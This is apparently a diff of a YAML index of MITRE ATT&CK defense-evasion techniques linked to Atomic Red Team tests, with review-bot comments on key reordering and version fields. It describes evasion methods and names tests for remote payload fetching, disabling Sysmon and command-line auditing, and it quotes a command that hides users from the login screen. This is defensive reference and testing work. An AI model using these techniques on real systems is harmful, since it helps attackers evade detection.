+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -14912,7 +15021,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -14936,7 +15044,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -14980,8 +15088,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests:
- name: Portable Executable Injection
@@ -15071,7 +15177,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -15095,7 +15201,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -15186,7 +15291,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests:
- name: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
@@ -15261,35 +15365,7 @@ defense-evasion:
default: Invoke-Mimikatz
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
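Review bot: the 28 lines removed here for T1497 (`x_mitre_platforms`, `x_mitre_contributors`, `object_marking_refs`, `id`, `created`, `external_references`) are not deleted from the object; the three following hunks for the same technique re-add every one of them at a different key position. The net change in this hunk is a key reordering plus the `modified` update, so it should be reviewed together with those hunks rather than read as a data loss.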
@@ -15301,6 +15377,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -15311,8 +15391,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -15322,9 +15408,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
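Review bot: the Deloitte Environment Awareness reference changes from the bare Drive link to `+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` with the Retrieved date moved to September 13, 2024; a `/edit` URL is the editor view of a Drive document rather than a share link, so please confirm this is what the upstream STIX data carries and that it opens for readers without edit rights. The same URL is emitted again for T1497.002 further down.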
@@ -15377,7 +15482,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -15415,8 +15520,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -15693,62 +15796,68 @@ defense-evasion:
name: command_prompt
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
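Review bot: the substantive change in this hunk is easy to miss among the reordered keys: T1480's description gains a third paragraph on user-agent filtering as a guardrail, a matching `Trellix-Qakbot` external reference is added, and `x_mitre_version` moves from 1.1 to 1.2; the platforms, contributors, detection text, data sources and `x_mitre_defense_bypassed` entries are unchanged content re-emitted in a new order. Please mention the version bump in the commit message, since consumers that compare technique versions will flag this technique.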
T1134.001:
technique:
@@ -15806,7 +15915,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
@@ -15971,7 +16079,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -15996,8 +16104,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -16058,7 +16164,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -16131,7 +16236,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -16160,7 +16265,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests:
- name: Create Hidden User in Registry
@@ -16249,11 +16353,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -16338,7 +16441,6 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests:
- name: Disable Windows Command Line Auditing using reg.exe
@@ -16409,7 +16511,7 @@ defense-evasion:
'
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -16484,45 +16586,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -16546,6 +16613,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -16556,9 +16626,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -16568,8 +16643,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
@@ -16626,7 +16728,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -16651,7 +16753,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -16911,7 +17012,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -16938,11 +17039,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -16996,7 +17096,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -17032,7 +17131,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -17058,8 +17157,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
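Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from KernelCallbackTable and adds nothing back, whereas the Valid Accounts hunks further down drop `x_mitre_attack_spec_version: 3.1.0` but re-add it as `3.2.0` next to `object_marking_refs`. The same drop-without-replacement appears for ROMMONkit, Modify System Image, Invalid Code Signature, Run Virtual Instance, SID-History Injection and Regsvcs/Regasm. Removing `spec_version` everywhere looks deliberate; please confirm these objects really carry no `x_mitre_attack_spec_version` upstream, or that it is re-emitted outside the shown context, rather than being lost by the generator.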
@@ -17085,7 +17182,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -17107,8 +17204,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -17174,7 +17269,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests:
- name: Compiled HTML Help Local Payload
@@ -17424,7 +17518,7 @@ defense-evasion:
name: command_prompt
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -17479,7 +17573,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests:
- name: Add Network Share
@@ -17715,7 +17808,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: Unload Sysmon Filter Driver
@@ -18657,7 +18749,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -18692,8 +18784,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -18759,7 +18849,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -18785,7 +18874,7 @@ defense-evasion:
